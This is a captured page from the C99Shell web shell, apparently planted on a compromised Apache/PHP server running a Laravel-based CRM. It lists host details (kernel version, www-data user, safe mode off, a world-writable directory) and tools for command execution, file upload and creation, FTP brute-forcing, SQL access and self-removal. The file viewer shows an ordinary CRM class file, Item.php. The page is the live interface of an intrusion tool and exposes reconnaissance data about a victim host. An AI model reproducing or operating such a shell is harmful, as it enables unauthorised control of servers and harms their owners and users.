!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/laravel-crm/packages/Webkul/Core/src/SystemConfig/   drwxrwxrwx
Free 13.18 GB of 57.97 GB (22.73%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Item.php (2.66 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Webkul\Core\SystemConfig;

use 
Illuminate\Support\Collection;

class 
Item
{
    
/**
     * Create a new Item instance.
     */
    
public function __construct(
        public 
Collection $children,
        public ?array 
$fields,
        public ?
string $icon,
        public ?
string $info,
        public 
string $key,
        public 
string $name,
        public ?
string $route null,
        public ?
int $sort null
    
) {}

    
/**
     * Get name of config item.
     */
    
public function getName(): string
    
{
        return 
$this->name ?? '';
    }

    
/**
     * Format options.
     */
    
private function formatOptions($options)
    {
        return 
is_array($options) ? $options : (is_string($options) ? $options : []);
    }

    
/**
     * Get fields of config item.
     */
    
public function getFields(): Collection
    
{
        return 
collect($this->fields)->map(function ($field) {
            return new 
ItemField(
                
item_key$this->key,
                
name$field['name'],
                
title$field['title'],
                
info$field['info'] ?? null,
                
type$field['type'],
                
depends$field['depends'] ?? null,
                
path$field['path'] ?? null,
                
validation$field['validation'] ?? null,
                default: 
$field['default'] ?? null,
                
channel_based$field['channel_based'] ?? null,
                
locale_based$field['locale_based'] ?? null,
                
options$this->formatOptions($field['options'] ?? null),
                
tinymce$field['tinymce'] ?? false,
                
is_visibletrue,
            );
        });
    }

    
/**
     * Get name of config item.
     */
    
public function getInfo(): ?string
    
{
        return 
$this->info;
    }

    
/**
     * Get current route.
     */
    
public function getRoute(): string
    
{
        return 
$this->route;
    }

    
/**
     * Get the url of the config item.
     */
    
public function getUrl(): string
    
{
        return 
route($this->getRoute());
    }

    
/**
     * Get the key of the config item.
     */
    
public function getKey(): string
    
{
        return 
$this->key;
    }

    
/**
     * Get Icon.
     */
    
public function getIcon(): ?string
    
{
        return 
$this->icon;
    }

    
/**
     * Check weather config item have children or not.
     */
    
public function haveChildren(): bool
    
{
        return 
$this->children->isNotEmpty();
    }

    
/**
     * Get children of config item.
     */
    
public function getChildren(): Collection
    
{
        if (! 
$this->haveChildren()) {
            return 
collect();
        }

        return 
$this->children;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0058 ]--